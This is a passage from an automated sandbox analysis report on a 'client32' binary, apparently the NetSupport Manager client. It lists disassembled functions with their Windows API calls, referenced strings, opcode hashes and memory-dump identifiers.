                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 906220102-2830328467
                                                                                • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                • m_hWnd, xrefs: 110151B6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                • API String ID: 819365019-3966830984
                                                                                • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                • m_hWnd, xrefs: 11017206
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                • API String ID: 819365019-3966830984
                                                                                • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 11001136
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 1604732272-2830328467
                                                                                • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • KillTimer.USER32(?,?), ref: 1100102B
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 11001016
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2229609774-2830328467
                                                                                • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoadVersion
                                                                                • String ID: AudioCapture.dll
                                                                                • API String ID: 3209957514-2642820777
                                                                                • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                                • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FindMessageSendWindow
                                                                                • String ID: MSOfficeWClass
                                                                                • API String ID: 1741975844-970895155
                                                                                • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                • API String ID: 1417657345-2201682149
                                                                                • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 1101D3A3
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 1590435379-2830328467
                                                                                • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                                Function 1115B910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MenuProp
                                                                                • String ID: OldMenu
                                                                                • API String ID: 601939786-3235417843
                                                                                • Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                • Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
                                                                                • Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                • Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9
